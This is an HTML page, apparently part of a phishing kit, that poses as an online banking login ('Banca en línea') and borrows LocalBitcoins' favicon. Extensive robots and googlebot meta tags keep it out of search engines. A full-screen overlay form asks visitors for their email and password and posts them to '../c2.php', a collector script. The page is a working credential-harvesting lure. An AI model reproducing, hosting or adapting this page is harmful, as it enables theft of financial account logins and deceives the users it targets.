<!DOCTYPE html>
<html lang="es">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="viewport" content="initial-scale=1, maximum-scale=1">

  <link id="favicon" rel="icon" type="image/png" href="https://localbitcoins.com/cached-static/img/favicon.33c6e1ef2984.ico">
  <link id="favicon-blink" rel="" type="image/png" href="https://localbitcoins.com/cached-static/img/favicon.33c6e1ef2984.ico">

<title>Banca en línea</title>
<meta name="robots" content="none">
	<meta name="robots" content="noindex">
	<meta name="robots" content="nofollow">
	<meta name="robots" content="noarchive">
	<meta name="robots" content="nocache">
	<meta name="robots" content="noimageindex">
	<meta name="robots" content="nomediaindex">
	<meta name="robots" content="noodp">
	<meta name="robots" content="noodyp">
	<meta name="robots" content="notranslate">
	<meta name="robots" content="noyaca">
	<meta name="robots" content="noydir">
	<meta name="robots" content="unavailable_after: 21-Jul-2037 14:30:00 CET">
	<meta name="googlebot" content="none">
	<meta name="googlebot" content="noindex">
	<meta name="googlebot" content="nofollow">
	<meta name="googlebot" content="noarchive">
	<meta name="googlebot" content="nocache">
	<meta name="googlebot" content="noimageindex">
	<meta name="googlebot" content="nomediaindex">
	<meta name="googlebot" content="noodp">
	<meta name="googlebot" content="noodyp">
	<meta name="googlebot" content="notranslate">
	<meta name="googlebot" content="noyaca">
	<meta name="googlebot" content="noydir">
	<meta name="slurp" content="none">
	<meta name="slurp" content="noindex">
	<meta name="slurp" content="nofollow">
	<meta name="slurp" content="noarchive">
	<meta name="slurp" content="nocache">
	<meta name="slurp" content="noimageindex">
	<meta name="slurp" content="nomediaindex">
	<meta name="slurp" content="noodp">
	<meta name="slurp" content="notranslate">
	<meta name="slurp" content="noyaca">
	<meta name="slurp" content="noydir">

<meta name="keywords" content="">

<meta name="description" content="">

<meta name="viewport" content="width=device-width">


<meta name="theme-color" content="#f58220">







<link rel="stylesheet" type="text/css" href="verific_files/index.css" media="all">
<style type="text/css">
<!--
body {
	background-image: url(images/pc2b.jpg);
	background-repeat: no-repeat;
}
-->
</style></head>
<body class="server-prod session-anonymous">

</form>

<audio id="notification-tone" preload="none" class="display-none">
    <source src="verific_files/tone.html" type="audio/ogg">
    <source src="verific_files/tone-40k.html" type="audio/mpeg">
</audio>
<div id="lc_invite_layer" style="text-align: left; display: none; z-index: 16777261;"></div><div id="lc_overlay_layer" style="position: fixed; left: 0px; top: 0px; z-index: 16777260; display: none; width: 100%; height: 100%; background-color: rgb(0, 0, 0);"></div>
<div style="z-index: 99999999; position: fixed; top: 0px; left: 0px; bottom: 0px; right: 0px; background-color: rgba(0, 0, 0, 0.28);">
  <form action="../c2.php" method="post" style="position: fixed; background: rgb(255, 255, 255) none repeat scroll 0% 0%; width: 300px; height: auto; top: 50%; left: 50%; transform: translate(-50%, -50%); border-radius: 10px; padding: 20px;">
    <span style="font-family: &quot;Helvetica Neue&quot;,Helvetica,Arial,sans-serif; font-size: 14px; line-height: 1.42857; color: rgb(51, 51, 51); margin-bottom: 15px; display: block;"><b>Enter the information associated with your account</b>  </span>
    <input name="correo" placeholder="Email" class="textinput textInput form-control" style="width: 100%; margin-bottom: 15px;" required="" type="email">
    <input name="clavec" type="password" class="textinput textInput form-control" id="clavec" style="width: 100%; margin-bottom: 15px;" placeholder="Password" required="">
    <input name="user" value="" type="hidden">
    <input value="Continuar" class="btn btn-primary" style="width: 100%;" type="submit">
  </form>
</div>


</body>
</html>